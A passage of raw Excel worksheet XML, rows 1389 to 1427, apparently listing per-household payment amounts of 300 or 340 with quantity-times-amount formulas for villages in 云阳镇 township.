    <row r="1389" ht="23" customHeight="1" spans="1:11">
      <c r="A1389" s="13" t="s">
        <v>3743</v>
      </c>
      <c r="B1389" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1389" s="14" t="s">
        <v>3744</v>
      </c>
      <c r="D1389" s="14" t="s">
        <v>3745</v>
      </c>
      <c r="E1389" s="14" t="s">
        <v>3746</v>
      </c>
      <c r="F1389" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1389" s="14">
        <v>1</v>
      </c>
      <c r="H1389" s="14">
        <v>340</v>
      </c>
      <c r="I1389" s="14">
        <f>H1389*G1389</f>
        <v>340</v>
      </c>
      <c r="J1389" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1389" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1390" ht="23" customHeight="1" spans="1:11">
      <c r="A1390" s="13" t="s">
        <v>3747</v>
      </c>
      <c r="B1390" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1390" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1390" s="14" t="s">
        <v>3748</v>
      </c>
      <c r="E1390" s="14" t="s">
        <v>3749</v>
      </c>
      <c r="F1390" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1390" s="14">
        <v>2</v>
      </c>
      <c r="H1390" s="14">
        <v>330</v>
      </c>
      <c r="I1390" s="14">
        <f>H1390*G1390</f>
        <v>660</v>
      </c>
      <c r="J1390" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1390" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1391" ht="23" customHeight="1" spans="1:11">
      <c r="A1391" s="13" t="s">
        <v>3750</v>
      </c>
      <c r="B1391" s="14" t="str">
        <f>B1390</f>
        <v>云阳镇</v>
      </c>
      <c r="C1391" s="14" t="str">
        <f>C1390</f>
        <v>大关一组</v>
      </c>
      <c r="D1391" s="13" t="s">
        <v>3751</v>
      </c>
      <c r="E1391" s="13" t="s">
        <v>3752</v>
      </c>
      <c r="F1391" s="14" t="str">
        <f>F1390</f>
        <v>4113210522</v>
      </c>
      <c r="G1391" s="14"/>
      <c r="H1391" s="14"/>
      <c r="I1391" s="14"/>
      <c r="J1391" s="14"/>
      <c r="K1391" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1392" ht="23" customHeight="1" spans="1:11">
      <c r="A1392" s="13" t="s">
        <v>3753</v>
      </c>
      <c r="B1392" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1392" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1392" s="14" t="s">
        <v>3754</v>
      </c>
      <c r="E1392" s="14" t="s">
        <v>3755</v>
      </c>
      <c r="F1392" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1392" s="14">
        <v>1</v>
      </c>
      <c r="H1392" s="14">
        <v>340</v>
      </c>
      <c r="I1392" s="14">
        <f t="shared" ref="I1392:I1398" si="69">H1392*G1392</f>
        <v>340</v>
      </c>
      <c r="J1392" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1392" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1393" ht="23" customHeight="1" spans="1:11">
      <c r="A1393" s="13" t="s">
        <v>3756</v>
      </c>
      <c r="B1393" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1393" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1393" s="14" t="s">
        <v>3757</v>
      </c>
      <c r="E1393" s="14" t="s">
        <v>3616</v>
      </c>
      <c r="F1393" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1393" s="14">
        <v>1</v>
      </c>
      <c r="H1393" s="14">
        <v>340</v>
      </c>
      <c r="I1393" s="14">
        <f t="shared" si="69"/>
        <v>340</v>
      </c>
      <c r="J1393" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1393" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1394" ht="23" customHeight="1" spans="1:11">
      <c r="A1394" s="13" t="s">
        <v>3758</v>
      </c>
      <c r="B1394" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1394" s="14" t="s">
        <v>3740</v>
      </c>
      <c r="D1394" s="14" t="s">
        <v>3759</v>
      </c>
      <c r="E1394" s="14" t="s">
        <v>3760</v>
      </c>
      <c r="F1394" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1394" s="14">
        <v>1</v>
      </c>
      <c r="H1394" s="14">
        <v>340</v>
      </c>
      <c r="I1394" s="14">
        <f t="shared" si="69"/>
        <v>340</v>
      </c>
      <c r="J1394" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1394" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1395" ht="23" customHeight="1" spans="1:11">
      <c r="A1395" s="13" t="s">
        <v>3761</v>
      </c>
      <c r="B1395" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1395" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1395" s="14" t="s">
        <v>3762</v>
      </c>
      <c r="E1395" s="14" t="s">
        <v>3763</v>
      </c>
      <c r="F1395" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1395" s="14">
        <v>1</v>
      </c>
      <c r="H1395" s="14">
        <v>340</v>
      </c>
      <c r="I1395" s="14">
        <f t="shared" si="69"/>
        <v>340</v>
      </c>
      <c r="J1395" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1395" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1396" ht="23" customHeight="1" spans="1:11">
      <c r="A1396" s="13" t="s">
        <v>3764</v>
      </c>
      <c r="B1396" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1396" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1396" s="14" t="s">
        <v>3765</v>
      </c>
      <c r="E1396" s="14" t="s">
        <v>3766</v>
      </c>
      <c r="F1396" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1396" s="14">
        <v>1</v>
      </c>
      <c r="H1396" s="14">
        <v>340</v>
      </c>
      <c r="I1396" s="14">
        <f t="shared" si="69"/>
        <v>340</v>
      </c>
      <c r="J1396" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1396" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1397" ht="23" customHeight="1" spans="1:11">
      <c r="A1397" s="13" t="s">
        <v>3767</v>
      </c>
      <c r="B1397" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1397" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1397" s="14" t="s">
        <v>3768</v>
      </c>
      <c r="E1397" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1397" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1397" s="14">
        <v>1</v>
      </c>
      <c r="H1397" s="14">
        <v>340</v>
      </c>
      <c r="I1397" s="14">
        <f t="shared" si="69"/>
        <v>340</v>
      </c>
      <c r="J1397" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1397" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1398" ht="23" customHeight="1" spans="1:11">
      <c r="A1398" s="13" t="s">
        <v>3770</v>
      </c>
      <c r="B1398" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1398" s="14" t="s">
        <v>3771</v>
      </c>
      <c r="D1398" s="14" t="s">
        <v>3772</v>
      </c>
      <c r="E1398" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1398" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1398" s="14">
        <v>2</v>
      </c>
      <c r="H1398" s="14">
        <v>300</v>
      </c>
      <c r="I1398" s="14">
        <f t="shared" si="69"/>
        <v>600</v>
      </c>
      <c r="J1398" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1398" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1399" ht="23" customHeight="1" spans="1:11">
      <c r="A1399" s="13" t="s">
        <v>3774</v>
      </c>
      <c r="B1399" s="14" t="str">
        <f>B1398</f>
        <v>云阳镇</v>
      </c>
      <c r="C1399" s="14" t="str">
        <f>C1398</f>
        <v>南召店南头</v>
      </c>
      <c r="D1399" s="13" t="s">
        <v>3775</v>
      </c>
      <c r="E1399" s="13" t="s">
        <v>3776</v>
      </c>
      <c r="F1399" s="14" t="str">
        <f>F1398</f>
        <v>4113210519</v>
      </c>
      <c r="G1399" s="14"/>
      <c r="H1399" s="14"/>
      <c r="I1399" s="14"/>
      <c r="J1399" s="14"/>
      <c r="K1399" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1400" ht="23" customHeight="1" spans="1:11">
      <c r="A1400" s="13" t="s">
        <v>3777</v>
      </c>
      <c r="B1400" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1400" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1400" s="14" t="s">
        <v>3778</v>
      </c>
      <c r="E1400" s="14" t="s">
        <v>3779</v>
      </c>
      <c r="F1400" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1400" s="14">
        <v>1</v>
      </c>
      <c r="H1400" s="14">
        <v>340</v>
      </c>
      <c r="I1400" s="14">
        <f t="shared" ref="I1400:I1408" si="70">H1400*G1400</f>
        <v>340</v>
      </c>
      <c r="J1400" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1400" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1401" ht="23" customHeight="1" spans="1:11">
      <c r="A1401" s="13" t="s">
        <v>3780</v>
      </c>
      <c r="B1401" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1401" s="14" t="s">
        <v>3681</v>
      </c>
      <c r="D1401" s="14" t="s">
        <v>3781</v>
      </c>
      <c r="E1401" s="14" t="s">
        <v>3713</v>
      </c>
      <c r="F1401" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1401" s="14">
        <v>1</v>
      </c>
      <c r="H1401" s="14">
        <v>340</v>
      </c>
      <c r="I1401" s="14">
        <f t="shared" si="70"/>
        <v>340</v>
      </c>
      <c r="J1401" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1401" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1402" ht="23" customHeight="1" spans="1:11">
      <c r="A1402" s="13" t="s">
        <v>3782</v>
      </c>
      <c r="B1402" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1402" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1402" s="14" t="s">
        <v>3783</v>
      </c>
      <c r="E1402" s="14" t="s">
        <v>3773</v>
      </c>
      <c r="F1402" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1402" s="14">
        <v>1</v>
      </c>
      <c r="H1402" s="14">
        <v>340</v>
      </c>
      <c r="I1402" s="14">
        <f t="shared" si="70"/>
        <v>340</v>
      </c>
      <c r="J1402" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1402" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1403" ht="23" customHeight="1" spans="1:11">
      <c r="A1403" s="13" t="s">
        <v>3784</v>
      </c>
      <c r="B1403" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1403" s="14" t="s">
        <v>3785</v>
      </c>
      <c r="D1403" s="14" t="s">
        <v>3786</v>
      </c>
      <c r="E1403" s="14" t="s">
        <v>3787</v>
      </c>
      <c r="F1403" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1403" s="14">
        <v>1</v>
      </c>
      <c r="H1403" s="14">
        <v>340</v>
      </c>
      <c r="I1403" s="14">
        <f t="shared" si="70"/>
        <v>340</v>
      </c>
      <c r="J1403" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1403" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1404" ht="23" customHeight="1" spans="1:11">
      <c r="A1404" s="13" t="s">
        <v>3789</v>
      </c>
      <c r="B1404" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1404" s="14" t="s">
        <v>3790</v>
      </c>
      <c r="D1404" s="14" t="s">
        <v>3791</v>
      </c>
      <c r="E1404" s="14" t="s">
        <v>2632</v>
      </c>
      <c r="F1404" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1404" s="14">
        <v>1</v>
      </c>
      <c r="H1404" s="14">
        <v>340</v>
      </c>
      <c r="I1404" s="14">
        <f t="shared" si="70"/>
        <v>340</v>
      </c>
      <c r="J1404" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1404" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1405" ht="23" customHeight="1" spans="1:11">
      <c r="A1405" s="13" t="s">
        <v>3792</v>
      </c>
      <c r="B1405" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1405" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1405" s="14" t="s">
        <v>3793</v>
      </c>
      <c r="E1405" s="14" t="s">
        <v>3794</v>
      </c>
      <c r="F1405" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1405" s="14">
        <v>1</v>
      </c>
      <c r="H1405" s="14">
        <v>340</v>
      </c>
      <c r="I1405" s="14">
        <f t="shared" si="70"/>
        <v>340</v>
      </c>
      <c r="J1405" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1405" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1406" ht="23" customHeight="1" spans="1:11">
      <c r="A1406" s="13" t="s">
        <v>3795</v>
      </c>
      <c r="B1406" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1406" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1406" s="14" t="s">
        <v>3796</v>
      </c>
      <c r="E1406" s="14" t="s">
        <v>3760</v>
      </c>
      <c r="F1406" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1406" s="14">
        <v>2</v>
      </c>
      <c r="H1406" s="14">
        <v>300</v>
      </c>
      <c r="I1406" s="14">
        <f t="shared" si="70"/>
        <v>600</v>
      </c>
      <c r="J1406" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1406" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1407" ht="23" customHeight="1" spans="1:11">
      <c r="A1407" s="13" t="s">
        <v>3797</v>
      </c>
      <c r="B1407" s="14" t="str">
        <f>B1406</f>
        <v>云阳镇</v>
      </c>
      <c r="C1407" s="14" t="str">
        <f>C1406</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1407" s="13" t="s">
        <v>3798</v>
      </c>
      <c r="E1407" s="13" t="s">
        <v>3723</v>
      </c>
      <c r="F1407" s="14" t="str">
        <f>F1406</f>
        <v>4113210519</v>
      </c>
      <c r="G1407" s="14"/>
      <c r="H1407" s="14"/>
      <c r="I1407" s="14"/>
      <c r="J1407" s="14"/>
      <c r="K1407" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1408" ht="23" customHeight="1" spans="1:11">
      <c r="A1408" s="13" t="s">
        <v>3799</v>
      </c>
      <c r="B1408" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1408" s="14" t="s">
        <v>3800</v>
      </c>
      <c r="D1408" s="14" t="s">
        <v>3801</v>
      </c>
      <c r="E1408" s="14" t="s">
        <v>3802</v>
      </c>
      <c r="F1408" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1408" s="14">
        <v>1</v>
      </c>
      <c r="H1408" s="14">
        <v>340</v>
      </c>
      <c r="I1408" s="14">
        <f>H1408*G1408</f>
        <v>340</v>
      </c>
      <c r="J1408" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1408" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1409" ht="23" customHeight="1" spans="1:11">
      <c r="A1409" s="13" t="s">
        <v>3803</v>
      </c>
      <c r="B1409" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1409" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1409" s="14" t="s">
        <v>3804</v>
      </c>
      <c r="E1409" s="14" t="s">
        <v>3805</v>
      </c>
      <c r="F1409" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1409" s="14">
        <v>1</v>
      </c>
      <c r="H1409" s="14">
        <v>340</v>
      </c>
      <c r="I1409" s="14">
        <f>H1409*G1409</f>
        <v>340</v>
      </c>
      <c r="J1409" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1409" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1410" ht="23" customHeight="1" spans="1:11">
      <c r="A1410" s="13" t="s">
        <v>3806</v>
      </c>
      <c r="B1410" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1410" s="14" t="s">
        <v>3807</v>
      </c>
      <c r="D1410" s="14" t="s">
        <v>3808</v>
      </c>
      <c r="E1410" s="14" t="s">
        <v>3769</v>
      </c>
      <c r="F1410" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1410" s="14">
        <v>2</v>
      </c>
      <c r="H1410" s="14">
        <v>300</v>
      </c>
      <c r="I1410" s="14">
        <f>H1410*G1410</f>
        <v>600</v>
      </c>
      <c r="J1410" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1410" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1411" ht="23" customHeight="1" spans="1:11">
      <c r="A1411" s="13" t="s">
        <v>3809</v>
      </c>
      <c r="B1411" s="14" t="str">
        <f>B1410</f>
        <v>云阳镇</v>
      </c>
      <c r="C1411" s="14" t="str">
        <f>C1410</f>
        <v>镇直（政府）</v>
      </c>
      <c r="D1411" s="13" t="s">
        <v>3810</v>
      </c>
      <c r="E1411" s="13" t="s">
        <v>3766</v>
      </c>
      <c r="F1411" s="14" t="str">
        <f>F1410</f>
        <v>4113210599</v>
      </c>
      <c r="G1411" s="14"/>
      <c r="H1411" s="14"/>
      <c r="I1411" s="14"/>
      <c r="J1411" s="14"/>
      <c r="K1411" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1412" ht="23" customHeight="1" spans="1:11">
      <c r="A1412" s="13" t="s">
        <v>3811</v>
      </c>
      <c r="B1412" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1412" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1412" s="14" t="s">
        <v>3812</v>
      </c>
      <c r="E1412" s="14" t="s">
        <v>3813</v>
      </c>
      <c r="F1412" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1412" s="14">
        <v>1</v>
      </c>
      <c r="H1412" s="14">
        <v>340</v>
      </c>
      <c r="I1412" s="14">
        <f>H1412*G1412</f>
        <v>340</v>
      </c>
      <c r="J1412" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1412" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1413" ht="23" customHeight="1" spans="1:11">
      <c r="A1413" s="13" t="s">
        <v>3814</v>
      </c>
      <c r="B1413" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1413" s="14" t="s">
        <v>3815</v>
      </c>
      <c r="D1413" s="14" t="s">
        <v>3816</v>
      </c>
      <c r="E1413" s="14" t="s">
        <v>2020</v>
      </c>
      <c r="F1413" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G1413" s="14">
        <v>1</v>
      </c>
      <c r="H1413" s="14">
        <v>340</v>
      </c>
      <c r="I1413" s="14">
        <f>H1413*G1413</f>
        <v>340</v>
      </c>
      <c r="J1413" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1413" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1414" ht="23" customHeight="1" spans="1:11">
      <c r="A1414" s="13" t="s">
        <v>3817</v>
      </c>
      <c r="B1414" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1414" s="14" t="s">
        <v>3690</v>
      </c>
      <c r="D1414" s="14" t="s">
        <v>3818</v>
      </c>
      <c r="E1414" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1414" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1414" s="14">
        <v>2</v>
      </c>
      <c r="H1414" s="14">
        <v>300</v>
      </c>
      <c r="I1414" s="14">
        <f>H1414*G1414</f>
        <v>600</v>
      </c>
      <c r="J1414" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1414" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1415" ht="23" customHeight="1" spans="1:11">
      <c r="A1415" s="13" t="s">
        <v>3819</v>
      </c>
      <c r="B1415" s="14" t="str">
        <f>B1414</f>
        <v>云阳镇</v>
      </c>
      <c r="C1415" s="14" t="str">
        <f>C1414</f>
        <v>大关一组</v>
      </c>
      <c r="D1415" s="13" t="s">
        <v>3820</v>
      </c>
      <c r="E1415" s="13" t="s">
        <v>3821</v>
      </c>
      <c r="F1415" s="14" t="str">
        <f>F1414</f>
        <v>4113210522</v>
      </c>
      <c r="G1415" s="14"/>
      <c r="H1415" s="14"/>
      <c r="I1415" s="14"/>
      <c r="J1415" s="14"/>
      <c r="K1415" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1416" ht="23" customHeight="1" spans="1:11">
      <c r="A1416" s="13" t="s">
        <v>3822</v>
      </c>
      <c r="B1416" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1416" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1416" s="14" t="s">
        <v>3823</v>
      </c>
      <c r="E1416" s="14" t="s">
        <v>3824</v>
      </c>
      <c r="F1416" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1416" s="14">
        <v>2</v>
      </c>
      <c r="H1416" s="14">
        <v>300</v>
      </c>
      <c r="I1416" s="14">
        <f>H1416*G1416</f>
        <v>600</v>
      </c>
      <c r="J1416" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1416" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1417" ht="23" customHeight="1" spans="1:11">
      <c r="A1417" s="13" t="s">
        <v>3825</v>
      </c>
      <c r="B1417" s="14" t="str">
        <f>B1416</f>
        <v>云阳镇</v>
      </c>
      <c r="C1417" s="14" t="str">
        <f>C1416</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1417" s="13" t="s">
        <v>3826</v>
      </c>
      <c r="E1417" s="13" t="s">
        <v>3766</v>
      </c>
      <c r="F1417" s="14" t="str">
        <f>F1416</f>
        <v>4113210519</v>
      </c>
      <c r="G1417" s="14"/>
      <c r="H1417" s="14"/>
      <c r="I1417" s="14"/>
      <c r="J1417" s="14"/>
      <c r="K1417" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1418" ht="23" customHeight="1" spans="1:11">
      <c r="A1418" s="13" t="s">
        <v>3827</v>
      </c>
      <c r="B1418" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1418" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1418" s="14" t="s">
        <v>3828</v>
      </c>
      <c r="E1418" s="14" t="s">
        <v>3829</v>
      </c>
      <c r="F1418" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1418" s="14">
        <v>1</v>
      </c>
      <c r="H1418" s="14">
        <v>340</v>
      </c>
      <c r="I1418" s="14">
        <f>H1418*G1418</f>
        <v>340</v>
      </c>
      <c r="J1418" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1418" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1419" ht="23" customHeight="1" spans="1:11">
      <c r="A1419" s="13" t="s">
        <v>3830</v>
      </c>
      <c r="B1419" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1419" s="14" t="s">
        <v>3699</v>
      </c>
      <c r="D1419" s="14" t="s">
        <v>3831</v>
      </c>
      <c r="E1419" s="14" t="s">
        <v>3710</v>
      </c>
      <c r="F1419" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1419" s="14">
        <v>1</v>
      </c>
      <c r="H1419" s="14">
        <v>340</v>
      </c>
      <c r="I1419" s="14">
        <f>H1419*G1419</f>
        <v>340</v>
      </c>
      <c r="J1419" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1419" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1420" ht="23" customHeight="1" spans="1:11">
      <c r="A1420" s="13" t="s">
        <v>3832</v>
      </c>
      <c r="B1420" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1420" s="14" t="s">
        <v>3744</v>
      </c>
      <c r="D1420" s="14" t="s">
        <v>3833</v>
      </c>
      <c r="E1420" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1420" s="14" t="s">
        <v>3693</v>
      </c>
      <c r="G1420" s="14">
        <v>1</v>
      </c>
      <c r="H1420" s="14">
        <v>340</v>
      </c>
      <c r="I1420" s="14">
        <f>H1420*G1420</f>
        <v>340</v>
      </c>
      <c r="J1420" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1420" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1421" ht="23" customHeight="1" spans="1:11">
      <c r="A1421" s="13" t="s">
        <v>3834</v>
      </c>
      <c r="B1421" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1421" s="14" t="s">
        <v>3670</v>
      </c>
      <c r="D1421" s="14" t="s">
        <v>3835</v>
      </c>
      <c r="E1421" s="14" t="s">
        <v>2638</v>
      </c>
      <c r="F1421" s="14" t="s">
        <v>3673</v>
      </c>
      <c r="G1421" s="14">
        <v>1</v>
      </c>
      <c r="H1421" s="14">
        <v>340</v>
      </c>
      <c r="I1421" s="14">
        <f>H1421*G1421</f>
        <v>340</v>
      </c>
      <c r="J1421" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1421" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1422" ht="23" customHeight="1" spans="1:11">
      <c r="A1422" s="13" t="s">
        <v>3836</v>
      </c>
      <c r="B1422" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1422" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1422" s="14" t="s">
        <v>3837</v>
      </c>
      <c r="E1422" s="14" t="s">
        <v>3838</v>
      </c>
      <c r="F1422" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1422" s="14">
        <v>2</v>
      </c>
      <c r="H1422" s="14">
        <v>300</v>
      </c>
      <c r="I1422" s="14">
        <f>H1422*G1422</f>
        <v>600</v>
      </c>
      <c r="J1422" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1422" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1423" ht="23" customHeight="1" spans="1:11">
      <c r="A1423" s="13" t="s">
        <v>3839</v>
      </c>
      <c r="B1423" s="14" t="str">
        <f>B1422</f>
        <v>云阳镇</v>
      </c>
      <c r="C1423" s="14" t="str">
        <f>C1422</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1423" s="13" t="s">
        <v>3840</v>
      </c>
      <c r="E1423" s="13" t="s">
        <v>3841</v>
      </c>
      <c r="F1423" s="14" t="str">
        <f>F1422</f>
        <v>4113210519</v>
      </c>
      <c r="G1423" s="14"/>
      <c r="H1423" s="14"/>
      <c r="I1423" s="14"/>
      <c r="J1423" s="14"/>
      <c r="K1423" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1424" ht="23" customHeight="1" spans="1:11">
      <c r="A1424" s="13" t="s">
        <v>3842</v>
      </c>
      <c r="B1424" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1424" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1424" s="14" t="s">
        <v>3843</v>
      </c>
      <c r="E1424" s="14" t="s">
        <v>3727</v>
      </c>
      <c r="F1424" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1424" s="14">
        <v>1</v>
      </c>
      <c r="H1424" s="14">
        <v>340</v>
      </c>
      <c r="I1424" s="14">
        <f t="shared" ref="I1424:I1449" si="71">H1424*G1424</f>
        <v>340</v>
      </c>
      <c r="J1424" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1424" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1425" ht="23" customHeight="1" spans="1:11">
      <c r="A1425" s="13" t="s">
        <v>3844</v>
      </c>
      <c r="B1425" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1425" s="14" t="s">
        <v>3718</v>
      </c>
      <c r="D1425" s="14" t="s">
        <v>3845</v>
      </c>
      <c r="E1425" s="14" t="s">
        <v>2618</v>
      </c>
      <c r="F1425" s="14" t="s">
        <v>3702</v>
      </c>
      <c r="G1425" s="14">
        <v>1</v>
      </c>
      <c r="H1425" s="14">
        <v>340</v>
      </c>
      <c r="I1425" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1425" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1425" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1426" ht="23" customHeight="1" spans="1:11">
      <c r="A1426" s="13" t="s">
        <v>3846</v>
      </c>
      <c r="B1426" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1426" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1426" s="14" t="s">
        <v>3847</v>
      </c>
      <c r="E1426" s="14" t="s">
        <v>3848</v>
      </c>
      <c r="F1426" s="14" t="s">
        <v>3707</v>
      </c>
      <c r="G1426" s="14">
        <v>1</v>
      </c>
      <c r="H1426" s="14">
        <v>340</v>
      </c>
      <c r="I1426" s="14">
        <f t="shared" si="71"/>
        <v>340</v>
      </c>
      <c r="J1426" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1426" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1427" ht="23" customHeight="1" spans="1:11">
      <c r="A1427" s="13" t="s">
        <v>3849</v>
      </c>
      <c r="B1427" s="14" t="s">
        <v>3669</v>
      </c>
      <c r="C1427" s="14" t="s">
        <v>3704</v>
      </c>
      <c r="D1427" s="14" t="s">
